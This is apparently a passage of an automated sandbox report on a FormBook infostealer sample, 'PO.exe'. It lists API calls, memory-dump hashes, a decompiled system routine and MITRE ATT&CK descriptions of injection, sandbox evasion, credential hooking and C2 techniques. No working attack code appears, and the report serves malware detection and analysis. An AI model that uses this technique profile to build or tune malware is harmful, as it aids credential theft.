CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008AA304

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 607b2f013fe672e851cf67dd36dae81953a34f7cea20728cd124b62b69553727
Instruction ID: 01f772fb53341a10f10d1ac6977b50f2f41e0995ac2cd81f351da014af5f173e
Opcode Fuzzy Hash: 607b2f013fe672e851cf67dd36dae81953a34f7cea20728cd124b62b69553727
Instruction Fuzzy Hash: 4401F2B2214148AFCB44DF88DC80DEB7BAAAF8C314F158258FA5997201C630E842CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 008A8D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0089F020,?,?,00000000), ref: 008A8DBC

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 3cefd60346042599f686949797791c99cfdbfa140840d651a850a684de9bf64d
Instruction ID: 60f861e6f942371d6f28e160c0393cc743dcf5df6ebe0ab4ce55386d279ef3be
Opcode Fuzzy Hash: 3cefd60346042599f686949797791c99cfdbfa140840d651a850a684de9bf64d
Instruction Fuzzy Hash: 6EE06D733803043AE73065ADAC02FA7B29CEB92B61F540026FB0DEB6C1D995F80142A5

Uniqueness

Uniqueness Score: -1.00%

Function 008AA391, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0089F1A2,0089F1A2,?,00000000,?,?), ref: 008AA3D0

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ca675ec9f83533502b87ef86d93c6352bcd31fda2864223950533ca3f7d35e51
Instruction ID: 767e911a4365e119fc49661b3263808781009daf34a701c40c83896ea7566001
Opcode Fuzzy Hash: ca675ec9f83533502b87ef86d93c6352bcd31fda2864223950533ca3f7d35e51
Instruction Fuzzy Hash: 5BF0A7716406046FDB14DF5CD884EDB3799EF89250F044564F949AB652D6319902CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 008AA200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(008A4506,?,008A4C7F,008A4C7F,?,008A4506,?,?,?,?,?,00000000,00000000,?), ref: 008AA22D

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b51d16fb5b18581118538ba0714d3da29a91a2fbac418ccd0f974e54724244fe
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 06E012B5210208ABDB18EF99CC41EA777ADEF88660F118558BA089B642C630F911CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 008AA3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0089F1A2,0089F1A2,?,00000000,?,?), ref: 008AA3D0

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d085de337d502727fdd521989034cf78111b720de0600443fd07203f3728c0cf
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A5E01AB52002086BDB14DF49CC85EE737ADEF89650F018154BA0857641CA30E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0089F699, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00898CF4,?), ref: 0089F6CB

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 234d56456c1999b03edcdc9a449f6e9114738d23bf9ce2c5046dd85e0f01ee7c
Instruction ID: 84f3e43ab222344286ab820106294c692eb50691e0fa0ac23052bc42a9926657
Opcode Fuzzy Hash: 234d56456c1999b03edcdc9a449f6e9114738d23bf9ce2c5046dd85e0f01ee7c
Instruction Fuzzy Hash: 40D05E657943043AEA14FAE89C03F6A3689AB55B10F0A00B4FAC8DB3D3EA60E5018166

Uniqueness

Uniqueness Score: -1.00%

Function 0089F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00898CF4,?), ref: 0089F6CB

Memory Dump Source

Source File: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: 5e9e36dbae9a0e233f6715e71193832db76ab29b3cce754f439f423d96fe4149
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: CFD05E616903043AEA10BAA89C03F263289AB55B10F490064FA48D62C3E950E4004165

Uniqueness

Uniqueness Score: -1.00%

Function 04CE967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CE9694

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 46b71691a7d0934ef13d22d733885ae913be6d5d81c549b686035e754971301d
Instruction ID: 2af99b5fec2dc05dcf0ca27f67f6432c05b3a299e9841021ce4b4492eaeedb70
Opcode Fuzzy Hash: 46b71691a7d0934ef13d22d733885ae913be6d5d81c549b686035e754971301d
Instruction Fuzzy Hash: 2BB09BF19014C5C5F751D7614A087277A1577D0745F27C052D2030641A477CD1D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04D3FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04D3FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04CECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04d3fdda
0x04d3fde2
0x04d3fde5
0x04d3fdec
0x04d3fdfa
0x04d3fdff
0x04d3fe0a
0x04d3fe0f
0x04d3fe17
0x04d3fe1e
0x04d3fe19
0x04d3fe19
0x04d3fe19
0x04d3fe20
0x04d3fe21
0x04d3fe22
0x04d3fe25
0x04d3fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D3FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D3FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D3FE2B

Memory Dump Source

Source File: 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true

Associated: 0000000A.00000002.502353877.0000000004D9B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.502368377.0000000004D9F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 3daa09bb9d804bcaa0d00e78eef8534773fad057c9d061f0b899b34650cc3e7e
Instruction ID: 53efaf49bf25234e3089ede813a7b06fa20e568a5eaa50747eaafe4e6c56acb3
Opcode Fuzzy Hash: 3daa09bb9d804bcaa0d00e78eef8534773fad057c9d061f0b899b34650cc3e7e
Instruction Fuzzy Hash: EAF0F072640201BFEA201A45DC06F33BBABEB44771F240318F668561E1EA62FC2096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282
stringfilecomCOMMON

Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156
filestringCOMMON

Function 73351000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88
filememorystringCOMMON

Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72
libraryloaderCOMMON

Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
fileCOMMON

Function 00403526, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215
stringregistrylibraryCOMMON

Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195
memoryCOMMON

Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
stringtimeCOMMON

Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173
fileCOMMON

Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
windowCOMMON

Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004054F7, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277
windowclipboardmemoryCOMMON

Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477
windowmemoryCOMMONCrypto

Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242
stringCOMMON

Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347
windowstringCOMMON

Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204
windowstringCOMMON

Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151
filememorystringCOMMON

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180
stringCOMMON

Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100
memoryfilestringCOMMON